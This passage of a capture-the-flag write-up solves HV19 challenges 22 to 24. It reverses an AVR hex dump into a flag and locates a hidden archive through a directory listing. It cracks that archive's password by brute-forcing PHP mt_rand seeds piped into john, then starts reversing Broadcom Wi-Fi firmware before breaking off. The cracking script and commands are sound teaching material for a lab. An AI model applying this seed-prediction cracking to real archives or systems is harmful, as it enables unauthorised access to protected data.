f.txt\n:100000000C9435000C945D000C945D000C945D0024\n:100010000C945D000C945D000C945D000C945D00EC\n:100020000C945D000C945D000C945D000C945D00DC\n:100030000C945D000C945D000C945D000C945D00CC\n:100040000C94EA010C945D000C945A020C94340256\n:100050000C945D000C945D000C945D000C945D00AC\n:100060000C945D000C945D00A60311241FBECFEF1D\n:10007000D8E0DEBFCDBF11E0A0E0B1E0EEE9F8E0EE\n:1000800002C005900D92A835B107D9F721E0A8E587\n:10009000B1E001C01D92AE3FB207E1F710E0C5E349\n:1000A000D0E004C02197FE010E944704C433D10769\n:1000B000C9F70E94D3030C944D040C9400000F93D5\n:1000C0001F93CF93DF93EC01E881F9810190F081D8\n:1000D000E02D09958C01E881F9810280F381E02D02\n:1000E00042E050E065E571E0CE010995800F911F77\n:1000F000DF91CF911F910F910895AF92BF92CF9250\n:10010000DF92EF92FF920F931F93CF93DF936C01D7\n:100110007B018B01040F151FEB015E01AE18BF08B8\n:10012000C017D10759F06991D601ED91FC9101906A\n:10013000F081E02DC6010995892B79F7C501DF9182\n:10014000CF911F910F91FF90EF90DF90CF90BF90D4\n:10015000AF900895FC01538D448D252F30E0842FFE\n:1001600090E0821B930B541710F0CF9608950197DF\n:100170000895FC01918D828D981761F0A28DAE0FCC\n:10018000BF2FB11D5D968C91928D9F5F9F73928F53\n:1001900090E008958FEF9FEF0895FC01918D828D7F\n:1001A000981731F0828DE80FF11D858D90E008954C\n:1001B0008FEF9FEF0895FC01918D228D892F90E0A4\n:1001C000805C9F4F821B91098F739927089588E562\n:1001D00091E00E94DB0021E0892B09F420E0822FCE\n:1001E000089580E090E0892B29F00E94E7008111BA\n:1001F0000C9400000895FC01A48DA80FB92FB11D27\n:10020000A35ABF4F2C91848D90E001968F7399274C\n:10021000848FA689B7892C93A089B1898C9183702A\n:1002200080648C93938D848D981306C00288F38923\n:10023000E02D80818F7D80830895EF92FF920F9350\n:100240001F93CF93DF93EC0181E0888F9B8D8C8D82\n:1002500098131AC0E889F989808185FF15C09FB776\n:10026000F894EE89FF896083E889F9898081837039\n:10027000806480839FBF81E090E0DF91CF911F91E8\n:100280000F91FF90EF900895F62E0B8D10E00F5F09\n:100290001F4F0F731127E02E8C8D8E110CC00FB6DF\n:1002A00007FCFACFE889F989808185FFF5CFCE0177\n:1002B0000E94FB00F1CFEB8DEC0FFD2FF11DE35AF7\n:1002C000FF4FF0829FB7F8940B8FEA89FB898081FA\n:1002D0008062CFCFCF93DF93EC01888D8823B9F074\n:1002E000AA89BB89E889F9898C9185FD03C0808141\n:1002F00086FD0DC00FB607FCF7CF8C9185FFF2CFBE\n:10030000808185FFEDCFCE010E94FB00E9CFDF9118\n:10031000CF910895CF92DF92EF92FF92CF93DF9328\n:10032000EC016A017B01E889F98982E08083C114CC\n:1003300081EED806E104F104A1F060E079E08DE3FC\n:1003400090E0A70196010E9425042150310941093E\n:1003500051095695479537952795211580E138071E\n:1003600098F0E889F989108260E874E88EE190E0FD\n:10037000A70196010E942504215031094109510924\n:100380005695479537952795EC85FD853083EE8505\n:10039000FF852083188EEC89FD8986E08083EA89B9\n:1003A000FB89808180618083EA89FB898081886004\n:1003B0008083EA89FB89808180688083EA89FB8960\n:1003C00080818F7D8083DF91CF91FF90EF90DF90D0\n:1003D000CF9008951F920F920FB60F9211242F9372\n:1003E0003F938F939F93AF93BF938091FA01909126\n:1003F000FB01A091FC01B091FD013091F90123E0D6\n:10040000230F2D3758F50196A11DB11D2093F90139\n:100410008093FA019093FB01A093FC01B093FD013E\n:100420008091F5019091F601A091F701B091F8014A\n:100430000196A11DB11D8093F5019093F601A09343\n:10044000F701B093F801BF91AF919F918F913F91C8\n:100450002F910F900FBE0F901F90189526E8230F35\n:100460000296A11DB11DD2CF1F920F920FB60F920F\n:1004700011242F933F934F935F936F937F938F93A9\n:100480009F93AF93BF93EF93FF9388E591E00E9412\n:10049000FB00FF91EF91BF91AF919F918F917F9161\n:1004A0006F915F914F913F912F910F900FBE0F90E1\n:1004B0001F9018951F920F920FB60F9211242F9331\n:1004C0008F939F93EF93FF93E0916801F0916901FF\n:1004D0008081E0916E01F0916F0182FD1BC09081DF\n:1004E000809171018F5F8F7320917201821741F0AB\n:1004F000E0917101F0E0E85AFE4F958F8093710111\n:10050000FF91EF919F918F912F910F900FBE0F90C0\n:100510001F9018958081F4CFCF93DF9300D000D047\n:10052000CDB7DEB789E290E0FC018081882F90E0B2\n:10053000807899279C838B838B819C81892BB9F44C\n:100540001A82198289819A818C9788F489819A818B\n:10055000895E9E4FFC018081682F88E591E00E94B2\n:100560005F0089819A8101969A838983EBCF0F90EE\n:100570000F900F900F90DF91CF910895CF93DF935D\n:10058000CDB7DEB7809102018093340180911401D0\n:1005900080931B018091110180932A0180910201B7\n:1005A000809325018091000180933C01809102019C\n:1005B000809322018091130180931E01809112018A\n:1005C000809338018091100180933D01DF91CF919C\n:1005D0000895CF93DF93CDB7DEB78091020180936A\n:1005E0002D01809102018093280180911101809357\n:1005F000390180910F0180933E0180910901809320\n:100600003B018091070180933A0180910D01809315\n:10061000210180910701809331018091070180932E\n:100620002E0180910A018093230180910301809320\n:100630001A01DF91CF910895CF93DF93CDB7DEB745\n:100640008091020180933F018091060180931801FF\n:10065000809110018093400180910B0180932401CF\n:1006600080910E01809327018091080180932F01D2\n:100670008091150180934101809111018093300197\n:100680008091070180931F018091020180933701BF\n:1006900080910F018093360180910201809329019E\n:1006A000DF91CF910895CF93DF93CDB7DEB78091DF\n:1006B0000E0180932C018091070180932601809187\n:1006C000040180931C0180910101809319018091A4\n:1006D0000701809335018091040180931701809177\n:1006E00005018093200180910C018093330180915A\n:1006F000070180932B018091020180931D0180915D\n:10070000110180933201DF91CF910895CF93DF9350\n:10071000CDB7DEB70E9453030E941C030E94E9027A\n:100720000E94BE02DF91CF910895CF93DF93CDB7A2\n:10073000DEB74CE251E060E070E088E591E00E94B5\n:100740008A010E948603DF91CF910895E8E5F1E0E8\n:100750001382128288EE93E0A0E0B0E08483958358\n:10076000A683B78387E491E09183808385EC90E052\n:100770009587848784EC90E09787868780EC90E06B\n:10078000918B808B81EC90E0938B828B82EC90E05C\n:10079000958B848B86EC90E0978B868B118E128ED6\n:1007A000138E148E0895789484B5826084BD84B5C8\n:1007B000816084BD85B5826085BD85B5816085BD5C\n:1007C00080916E00816080936E0010928100809114\n:1007D000810082608093810080918100816080939C\n:1007E0008100809180008160809380008091B100C1\n:1007F00084608093B1008091B00081608093B000EC\n:1008000080917A00846080937A0080917A0082607F\n:1008100080937A0080917A00816080937A00809141\n:100820007A00806880937A001092C1000E9495033C\n:10083000C0E0D0E00E948C022097E1F30E94E70024\n:100840008823C1F30E940000F5CFA1E21A2EAA1B53\n:10085000BB1BFD010DC0AA1FBB1FEE1FFF1FA21770\n:10086000B307E407F50720F0A21BB30BE40BF50B6D\n:10087000661F771F881F991F1A9469F760957095F6\n:10088000809590959B01AC01BD01CF010895EE0FBD\n:0E089000FF1F0590F491E02D0994F894FFCF1E\n:10089E00303133394853565F61636467686C6D6EEF\n:1008AE00727478797B7D002020202020202020204B\n:1008BE00202020202020202020202020202020202A\n:1008CE00202020202020202020202020202020201A\n:1008DE00202000000000001D017D00AA006A01DB3F\n:0808EE0000B900CD000D0A0065\n:00000001FF<\/pre>\n<br\/>We can use <code>AVR Studio 4<\/code> to disassemble the binary.\n<br\/>\n<br\/>One very flashy region within the memory dump should catch our eye:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/22_01_avr.png\" width=\"1000px\"\/>\n<br\/>\n<br\/>The memory holds an alphabet containing the following letters: <code>0139HSV_acdghlmnrtxy{}<\/code>. Obviously this is used for the flag since it contains all the necessary characters (<code>HV19{}<\/code>).\n<br\/>\n<br\/>With this in mind, let's get an overview of the disassembly output. We should especially look out for references to the alphabet.\n<br\/>\n<br\/>Scrolling over the disassembly, the following part seems to be interesting:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/22_02_avr.png\" width=\"1000px\"\/>\n<br\/>\n<br\/>These instructions load data from memory and store it at another address. What is especially notable here is that the addresses from which the data is loaded sometimes repeat like <code>0x102<\/code>, which is used three times in the above screenshot. The addresses at which the data is stored seem to be used uniquely. This sounds exactly like an alphabet being used to create a string within another memory region. Accordingly let's write down the mapping:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/22# cat mapping\n102     134\n114     11b\n111     12a\n102     125\n100     13c\n102     122\n113     11e\n112     138\n110     13d\n102     12d\n102     128\n111     139\n10f     13e\n107     13a\n10d     121\n107     131\n107     12e\n10a     123\n103     11a\n102     13f\n106     118\n110     140\n10b     124\n10e     127\n108     12f\n115     141\n111     130\n107     11f\n102     137\n10f     136\n102     129\n10e     12c\n107     126\n104     11c\n101     119\n107     135\n104     117\n105     120\n10c     133\n107     12b\n102     11d\n<\/pre>\n<br\/>According to our assumption the first value is an index into the alphabet and the second value is the destination address for the corresponding character of the alphabet. The smallest index used is <code>0x100<\/code> and the smallest destination address is <code>0x117<\/code>. The following python script iterates over the mapping and inserts the referenced character from the alphabet at the corresponding position within the destination string:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nalpha = '0139HSV_acdghlmnrtxy{}'\n\nlines = open('mapping').read().split('\\n')[:-1]\nflag = [' '] * 50\n\nfor line in lines:\n  values = line.split('\\t')\n  idx = int(values[0], 16) - 0x100\n  dst = int(values[1], 16) - 0x117\n  flag[dst] = alpha[idx]\n\nprint(''.join(flag))<\/pre>\n<br\/>Running the script prints the flag, although two characters are missing:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/22# .\/flag.py\nHV19{H3y_Sl3dg3_m33t_m3_at_ h3_n3xt_ 0rn3r}\n<\/pre>\n<br\/>Two characters are missing because the following two load\/store sequences contain a zero destination address \/ index: \n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/22_03_avr.png\" width=\"700px\"\/>\n<br\/>\n<br\/>The first sequence loads the letter <code>'c'<\/code> (<code>0x109<\/code>), which obviously is supposed to be stored at <code>0x13b<\/code>. Also the missing character supposed to be stored at <code>0x132<\/code> is obviously the letter <code>'t'<\/code>.\n<br\/>\n<br\/>Thus the flag is <span class=\"spanFlag\">HV19{H3y_Sl3dg3_m33t_m3_at_th3_n3xt_c0rn3r}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.23\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.23 - Internet&nbsp;Data&nbsp;Archive<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_23.png\" \/><\/td><td style=\"color:#333333\">Author: M.<\/td><\/tr><tr><td colspan=\"2\">Today's flag is available in the Internet Data Archive (IDA).\n<br\/>\n<br\/><span class=\"link\">http:\/\/whale.hacking-lab.com:23023\/<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to the <code>Internet Data Archive<\/code>. We can enter a username and select different challenges from the past. There is also a disabled flag checkbox:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_01_ida.png\" width=\"600px\"\/>\n<br\/>\n<br\/>After submitting the request a one-time password is displayed and we can download our archive:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_02_otp.png\" width=\"500px\"\/>\n<br\/>\n<br\/>The archive is a zip file, which contains the challenges we selected:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# wget http:\/\/whale.hacking-lab.com:23023\/tmp\/bobby-data.zip\n--2019-12-28 11:02:11--  http:\/\/whale.hacking-lab.com:23023\/tmp\/bobby-data.zip\nResolving whale.hacking-lab.com (whale.hacking-lab.com)... 80.74.140.188\nConnecting to whale.hacking-lab.com (whale.hacking-lab.com)|80.74.140.188|:23023... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 47074 (46K) [application\/zip]\nSaving to: \u2018bobby-data.zip\u2019\n\nbobby-data.zip                100%[=================================================&gt;]  45.97K  --.-KB\/s    in 0.06s\n\n2019-12-28 11:02:11 (803 KB\/s) - \u2018bobby-data.zip\u2019 saved [47074\/47074]\n\nroot@kali:~\/hv19\/23# file bobby-data.zip\nbobby-data.zip: Zip archive data, at least v2.0 to extract\nroot@kali:~\/hv19\/23# zipinfo bobby-data.zip\nArchive:  bobby-data.zip\nZip file size: 47074 bytes, number of entries: 2\n-rw-rw-rw-  6.3 unx    46565 Bx u099 19-Sep-21 13:35 ball15.png\n-rw-rw-rw-  6.3 unx      727 Bx u099 19-Sep-21 13:25 cake.txt\n2 files, 47292 bytes uncompressed, 46796 bytes compressed:  1.0%\n<\/pre>The archive can be uncompressed\/decrypted using the provided one-time password:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# 7z x bobby-data.zip\n\n7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21\np7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Celeron(R) CPU N3450 @ 1.10GHz (506C9),ASM,AES-NI)\n\nScanning the drive for archives:\n1 file, 47074 bytes (46 KiB)\n\nExtracting archive: bobby-data.zip\n--\nPath = bobby-data.zip\nType = zip\nPhysical Size = 47074\n\n\nEnter password (will not be echoed): (Sw6q4QJmvBwv)\nEverything is Ok\n\nFiles: 2\nSize:       47292\nCompressed: 47074<\/pre>\n<br\/>The link to our archive looks like this: <code>http:\/\/whale.hacking-lab.com:23023\/tmp\/bobby-data.zip<\/code>. When simply browsing to <code>http:\/\/whale.hacking-lab.com:23023\/tmp\/<\/code> we can see that directory listing is enabled for this folder:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_03_dirlist.png\" width=\"700px\"\/>\n<br\/>\n<br\/>Browsing through the uploaded files we can spot a file with a much older <code>last modified<\/code> timestamp:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/23_04_santa_archive.png\" width=\"700px\"\/>\n<br\/>\n<br\/>This archive actually contains the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# wget http:\/\/whale.hacking-lab.com:23023\/tmp\/Santa-data.zip\n--2019-12-28 11:10:05--  http:\/\/whale.hacking-lab.com:23023\/tmp\/Santa-data.zip\nResolving whale.hacking-lab.com (whale.hacking-lab.com)... 80.74.140.188\nConnecting to whale.hacking-lab.com (whale.hacking-lab.com)|80.74.140.188|:23023... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 349592 (341K) [application\/zip]\nSaving to: \u2018Santa-data.zip\u2019\n\nSanta-data.zip                100%[=================================================&gt;] 341.40K  --.-KB\/s    in 0.1s\n\n2019-12-28 11:10:06 (2.34 MB\/s) - \u2018Santa-data.zip\u2019 saved [349592\/349592]\n\nroot@kali:~\/hv19\/23# zipinfo Santa-data.zip\nArchive:  Santa-data.zip\nZip file size: 349592 bytes, number of entries: 6\n-rw-rw-rw-  6.3 unx       37 Bx u099 19-Sep-22 16:31 flag.txt\n-rw-rw-rw-  6.3 unx   120979 Bx u099 19-Aug-04 09:53 pearl.png\n-rw-rw-rw-  6.3 unx    46565 Bx u099 19-Sep-21 15:35 ball15.png\n-rw-rw-rw-  6.3 unx      727 Bx u099 19-Sep-21 15:25 cake.txt\n-rw-rw-rw-  6.3 unx   183606 Bx u099 18-Dec-27 18:14 blindball.png\n-rw-rw-rw-  6.3 unx     2560 Bx u099 19-Sep-22 00:49 GoodOldTimes.exe\n6 files, 354474 bytes uncompressed, 348782 bytes compressed:  1.6%<\/pre>Unfortunately we don't know the corresponding one-time password.\n<br\/>\n<br\/>The abbreviation for the website (the website's title is even called <code>IDA PRO<\/code>) doesn't seem to be a coincidence. A little bit of googling reveals <a href=\"https:\/\/devco.re\/blog\/2019\/06\/21\/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en\/\" rel=\"noopener noreferrer\" target=\"_blank\">this blog post<\/a>, which describes how to generate an <code>IDA Pro<\/code> (<code>Interactive Disassembler<\/code>) installation password. As it happens the charset for the one-time password seems to be exactly the same as well as the password length.\n<br\/>\n<br\/>The mentioned blog post provides a perl script, which generates installation passwords. In order to do this the script initializes the PRNG with a seed (<code>srand<\/code>) and then generates 12 random numbers modulo <code>54<\/code> which are used as an index into the alphabet being used (<code>abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789<\/code>).\n<br\/>\n<br\/>The following solution is probably not the most sophisticated one since the internal details of the implementation are not taken into account, but it simply worked \ud83d\ude42 Thanks to <code>Tyrox<\/code> for giving me a good hint on this one.\n<br\/>\n<br\/>The previously mentioned perl script uses perl to generate the one-time passwords and is thus using perl's PRNG. The challenge's website is using PHP. Thus the assumption that it is using the PHP PRNG to generate the one-time passwords is not that far-off. If we rebuilt the mentioned perl script in PHP with the appropriate PRNG we might be able to crack santa's zip archive.\n<br\/>\n<br\/>At first let's create a hash from the zip archive which can be processed by <code>john<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# zip2john Santa-data.zip\nSanta-data.zip\/flag.txt:$zip2$*0*1*0*d75ebd89add5cf76*75ca*25*8249d36387bf723d66085cb4334858bc69989550a643c4a614645d505889e91bdbd269787a*fe232081a44c398eeab9*$\/zip2$:flag.txt:Santa-data.zip:Santa-data.zip\nver 1.0 Santa-data.zip\/flag.txt PKZIP Encr: cmplen=57, decmplen=37, crc=B31E19FF\nver 2.0 Santa-data.zip\/pearl.png PKZIP Encr: cmplen=119024, decmplen=120979, crc=8994CA4C\nver 2.0 Santa-data.zip\/ball15.png PKZIP Encr: cmplen=46510, decmplen=46565, crc=5E20478F\nver 2.0 Santa-data.zip\/cake.txt PKZIP Encr: cmplen=310, decmplen=727, crc=25981C5A\nver 2.0 Santa-data.zip\/blindball.png PKZIP Encr: cmplen=182328, decmplen=183606, crc=F0442C30\nver 2.0 Santa-data.zip\/GoodOldTimes.exe PKZIP Encr: cmplen=625, decmplen=2560, crc=EF6B229B\nSanta-data.zip:$pkzip2$3*1*1*0*63*24*5e20*7c67*69e5d5637af3005ba4c1061964f8037c23d4d912fd8dd6bc59e65eadfc791a5c163461bc*1*0*63*24*8994*4eaf*99dc5ea6d837c104740f6d9e883d8b4c44028b2c0eed3f575925352e966cbe3c96c49176*2*0*39*25*b31e19ff*0*31*63*39*b31e*83ea*d75ebd89add5cf7675ca8249d36387bf723d66085cb4334858bc69989550a643c4a614645d505889e91bdbd269787afe232081a44c398eeab9*$\/pkzip2$::Santa-data.zip:flag.txt, ball15.png, pearl.png:Santa-data.zip\nNOTE: It is assumed that all files in each archive have the same password.\nIf that is not the case, the hash may be uncrackable. To avoid this, use\noption -o to pick a file at a time.\nroot@kali:~\/hv19\/23\/t# zip2john Santa-data.zip &gt; santa-hash.txt\n...<\/pre>\n<br\/>Now we need to rebuilt the perl script in PHP:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&lt;?php\n\n$alpha = 'abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789';\n\nfor ($i = 0; $i &lt; 0x100000000000; $i++) {\n  mt_srand($i);\n  $pw = '';\n  for ($j = 0; $j &lt; 12; $j++) {\n    $pw .= $alpha[mt_rand(0,53)];\n  }\n  echo $pw.\"\\n\";\n}\n\n?&gt;\n<\/pre>\n<br\/>The PHP script defines the alphabet from the previously mentioned blog post and continuously initializes the PRNG by calling <code>mt_srand<\/code> with another number (<code>$i<\/code>) followed by the generation of the one-time password.\n<br\/>\n<br\/>All generate one-time passwords are printed to stdout:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# php crackOTP.php | head\nDj3BC7CRRj9x\nJfvKCwGA9QxT\nQsPaYTQqYsWR\nUKRykpBmCb8Z\nzHJ3yKueWjUD\nP4hTYMk3gFR4\nY77c8j3p2afh\njUXSqsPVeu8b\nZUjdXe87Khim\nFzvf6rCthmaF\n<\/pre>\n<br\/>In order to directly pipe the generated passwords to john, we can use the <code>--stdin<\/code> option:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# php crackOTP.php | john --stdin santa-hash.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128\/128 SSE2 4x])\nWill run 2 OpenMP threads\nPress Ctrl-C to abort, or send SIGUSR1 to john process for status\n<\/pre>\n<br\/>After a few minutes we actually get a hit:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\nKwmq3Sqmc5sA     (Santa-data.zip\/flag.txt)\n1g 0:00:10:12  0.001633g\/s 7079p\/s 7079c\/s 7079C\/s jDdDjuYS9mBG..ApwYqaWtC2Zh\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed\n<\/pre>\n<br\/>The password <code>Kwmq3Sqmc5sA<\/code> can be used to uncompressed\/decrypt the archive:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# 7z x Santa-data.zip\n\n7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21\np7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Celeron(R) CPU N3450 @ 1.10GHz (506C9),ASM,AES-NI)\n\nScanning the drive for archives:\n1 file, 349592 bytes (342 KiB)\n\nExtracting archive: Santa-data.zip\n--\nPath = Santa-data.zip\nType = zip\nPhysical Size = 349592\n\n\nEnter password (will not be echoed): (Kwmq3Sqmc5sA)\nEverything is Ok\n\nFiles: 6\nSize:       354474\nCompressed: 349592<\/pre>\n<br\/>We actually got the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/23# cat flag.txt\nHV19{Cr4ckin_Passw0rdz_like_IDA_Pr0}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Cr4ckin_Passw0rdz_like_IDA_Pr0}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.24\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.24 - ham&nbsp;radio<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_24.png\" \/><\/td><td style=\"color:#333333\">Author: DrSchottky<\/td><\/tr><tr><td colspan=\"2\">Elves built for santa a special radio to help him coordinating today's presents delivery.\n<br\/>\n<br\/><span class=\"link\">HV19-ham radio.zip<\/span>\n<br\/>\n<br\/>As little present and in order not to screw up your whole christmas, you have 3 whole days to solve this puzzle.\n<br\/>\n<br\/>Happy christmas!<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a file called <code>brcmfmac43430-sdio.bin<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# unzip 19bf7592-f3ee-474c-bf82-233f270bbf70.zip\nArchive:  19bf7592-f3ee-474c-bf82-233f270bbf70.zip\n  inflating: brcmfmac43430-sdio.bin\nroot@kali:~\/hv19\/24# file brcmfmac43430-sdio.bin\nbrcmfmac43430-sdio.bin: data<\/pre>By googling for the filename and trawling through the <a href=\"https:\/\/github.com\/DrSchottky\" rel=\"noopener noreferrer\" target=\"_blank\">challenge author's github repo<\/a>, it seemed likely that the challenge is related to <a href=\"https:\/\/github.com\/seemoo-lab\/nexmon\" rel=\"noopener noreferrer\" target=\"_blank\">nexmon<\/a>. Accordingly the file seems to be a firmware for a broadcom 43430 wireless chipset.\n<br\/>\n<br\/>Since <code>file<\/code> didn't even identify any known file type (<code>data<\/code>), I wondered which processor architecture this kind of chipset is using. After a bit of googling once again, I stumbled upon <a href=\"https:\/\/blog.quarkslab.com\/reverse-engineering-broadcom-wireless-chipsets.html\" rel=\"noopener noreferrer\" target=\"_blank\">this well written blog post<\/a>. Despite plenty of details on how to reverse engineer a broadcom wireless chipset, the blog post contains a table which states that the <code>bcm43430<\/code> is using an <code>ARM Cortex M3<\/code>. With this information let's fire up <code>ghidra<\/code> and see if it can decompile the binary.\n<br\/>\n<br\/>Indeed <code>ghidra<\/code> offers a big endian and a little endian ARM cortex architecture. By selecting the second one (little endian) ...\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_01_ghidra_arc.png\" width=\"500px\"\/>\n<br\/>\n<br\/>... the binary can actually be decompiled:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_02_ghidra_decompl.png\" width=\"900px\"\/>\n<br\/>\n<br\/>There are plenty of functions since we are facing a whole firmware. My assumption was that the flag related code will probably use XOR. The ARM instruction for XOR is called <code>EOR<\/code>. Thus I started to search for <code>EOR<\/code> within the instruction mnemonics. Of course there are quite a few parts in the code, which use XOR, but the following part is obviously not part of the ordinary firmware:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_03_ghidra_eor.png\" width=\"900px\"\/>\n<br\/>\n<br\/>We can see a reference to a base64 string, which can also be revealed by simply using <code>strings<\/code> on the binary:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# strings brcmfmac43430-sdio.bin\n...\n8hyh\n8iyi\nAF3FHF\n2F(F\nUm9zZXMgYXJlIHJlZCwgVmlvbGV0cyBhcmUgYmx1ZSwgRHJTY2hvdHRreSBsb3ZlcyBob29raW5nIGlvY3Rscywgd2h5IHNob3VsZG4ndCB5b3U\/\npGnexmon_ver: 2.2.2-269-g4921d-dirty-16\nwl%d: Broadcom BCM%s 802.11 Wireless Controller %s\n...<\/pre>\n<br\/>Though the string only contains a message from the author:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# echo Um9zZXMgYXJlIHJlZCwgVmlvbGV0cyBhcmUgYmx1ZSwgRHJTY2hvdHRreSBsb3ZlcyBob29raW5nIGlvY3Rscywgd2h5IHNob3VsZG4ndCB5b3U\/|base64 -d\nRoses are red, Violets are blue, DrSchottky loves hooking ioctls, why shouldn't you?<\/pre>\n<br\/>The part of the decompiled output, which looks really juciy, is the following:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_04_juciy.png\" \/>\n<br\/>\n<br\/>Two variables are initialized (<code>pbVar2<\/code> and <code>pbVar3<\/code>) followed by a loop, which XORs every byte of the data being referenced by both of those two variables. This looks obviously like the flag being <i>\"decrypted\"<\/i>. The data, which is referenced, is stored at <code>0x00058e94<\/code> and <code>0x00058eac<\/code> respectively (the correct addresses can be read from the disassembly output):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/24_05_data.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Though when reassembling the part of the code in python ...\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nv1 = '\\x09\\xBC\\x31\\x3A\\x68\\x1A\\xAB\\x72\\x47\\x86\\x7E\\xE6\\x4A\\x1D\\x6F\\x04\\x2E\\x74\\x50\\x0D\\x78\\x06\\x3E\\x00'\nv2 = '\\x6A\\x91\\x44\\x3B\\xBE\\x27\\x15\\x92\\x07\\xC9\\xF3\\x47\\x77\\xED\\xE5\\x26\\x10\\x76\\x74\\x80\\x57\\x1F\\x00'\n\nout = ''\nfor i in range(len(v2)):\n  out += chr(ord(v1[i]) ^ ord(v2[i]))\n\nprint(out)\nprint(out.encode('hex'))<\/pre>\n<br\/>... we only get rubbish:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/24# .\/decrypt.py\nc-u\u2592=\u2592\u2592@O\u2592\u2592=\u2592\"&gt;$\u2592\/&gt;\n632d7501d63dbee0404f8da13df08a223e02248d2f193e\n<\/pre>\n<br\/>Further inspecting the decompiled output we can notice a few calls to functions being located at addresses <code>&gt;= 